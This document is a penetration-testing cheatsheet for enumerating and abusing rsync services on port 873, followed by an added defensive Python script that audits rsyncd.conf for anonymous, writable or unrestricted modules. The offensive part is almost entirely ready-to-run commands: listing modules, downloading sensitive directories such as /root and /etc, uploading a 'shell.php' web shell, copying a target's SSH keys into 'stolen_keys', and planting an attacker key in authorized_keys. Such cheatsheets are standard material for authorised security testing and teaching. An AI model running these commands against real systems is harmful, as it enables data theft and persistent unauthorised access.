Rsync Enumeration Cheatsheet
Default Port: 873 (TCP)
Detection
nmap -p 873 <ip>
nmap -p 873 -sV <ip>
nmap -p 873 --script rsync-list-modules <ip>
nc -nv <ip> 873
List Available Modules (Shares)
# List modules (no auth)
rsync -av --list-only rsync://<ip>/
rsync rsync://<ip>/
# nc banner grab
nc -nv <ip> 873
# The server greets with "@RSYNCD: <version>"; send that same line back, then type: #list
Enumerate Files in a Module
rsync -av --list-only rsync://<ip>/<module>/
rsync -av --list-only rsync://<ip>/<module>/subdir/
# Recursive listing of entire module
rsync -r --list-only rsync://<ip>/<module>/
Download Files
# Download single file
rsync rsync://<ip>/<module>/file.txt ./
# Download entire module
rsync -av rsync://<ip>/<module>/ ./local_copy/
# With credentials
rsync -av rsync://<user>@<ip>/<module>/ ./
rsync --password-file=pass.txt rsync://<user>@<ip>/<module>/ ./
# Dry run (see what would be downloaded)
rsync -av --dry-run rsync://<ip>/<module>/ ./
Upload Files
# Upload single file
rsync -av ./shell.php rsync://<user>@<ip>/<module>/
# Upload directory
rsync -av ./payload/ rsync://<user>@<ip>/<module>/uploads/
# With password file
rsync --password-file=pass.txt -av ./file rsync://<user>@<ip>/<module>/
High-Value Paths to Check
rsync -av --list-only rsync://<ip>/home/
rsync -av --list-only rsync://<ip>/root/
rsync -av --list-only rsync://<ip>/etc/
rsync -av --list-only rsync://<ip>/backup/
rsync -av --list-only rsync://<ip>/var/www/
rsync -av --list-only rsync://<ip>/.ssh/
SSH Key Theft & Planting
# Download .ssh directory
rsync -av rsync://<ip>/home/<user>/.ssh/ ./stolen_keys/
# Plant authorized_keys (if write access)
rsync -av ~/.ssh/id_rsa.pub rsync://<user>@<ip>/home/<user>/.ssh/authorized_keys
Nmap Scripts
nmap -p 873 --script rsync-list-modules <ip>
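Defender's view of the findings above, as an added example that is not part of the original cheatsheet: a small Python auditor for rsyncd.conf that flags the module settings these commands depend on (anonymous access, writable modules, modules visible in the listing, no hosts allow restriction, exports of sensitive paths). The sample configuration, module names and finding labels are constructed for illustration; the parameter names and defaults are those documented for rsyncd.conf.

```python
import re

# Constructed sample rsyncd.conf; module names and paths are invented.
SAMPLE_CONF = """\
[backup]
    path = /srv/backup
    read only = no
[home]
    path = /home
    list = no
    auth users = alice
    hosts allow = 10.0.0.0/8
"""
SENSITIVE = ("/home", "/root", "/etc", "/var/www")  # locations this page probes
FALSE = {"no", "false", "0"}

def parse(text):
    """Return {module: params}; global params act as per-module defaults."""
    glob, mods, cur = {}, {}, None
    for line in map(str.strip, text.splitlines()):
        if not line or line.startswith("#"):
            continue
        head = re.fullmatch(r"\[(.+)\]", line)
        if head:
            cur = mods.setdefault(head.group(1).strip(), {})
        elif "=" in line:
            key, val = line.split("=", 1)
            key = re.sub(r"\s+", "", key).lower()  # "read only" -> "readonly"
            (glob if cur is None else cur)[key] = val.strip()
    return {name: {**glob, **p} for name, p in mods.items()}

def audit(text):
    """Return {module: [findings]}, applying rsyncd.conf defaults when unset."""
    report = {}
    for name, p in parse(text).items():
        path = p.get("path", "")
        path = path.rstrip("/") or path[:1]
        checks = {
            "anonymous": not p.get("authusers"),                    # default: no auth
            "writable": p.get("readonly", "yes").lower() in FALSE,  # default: read only
            "listed": p.get("list", "yes").lower() not in FALSE,    # default: listed
            "any-host": not p.get("hostsallow"),                    # default: all hosts
            "sensitive-path": path == "/" or any(
                path == s or path.startswith(s + "/") for s in SENSITIVE),
        }
        report[name] = [k for k, hit in checks.items() if hit]
    return report

if __name__ == "__main__": print(audit(SAMPLE_CONF))
```

A module reported as both anonymous and writable is the case the Upload Files and SSH key sections rely on; setting auth users with a secrets file and leaving read only at its default closes it.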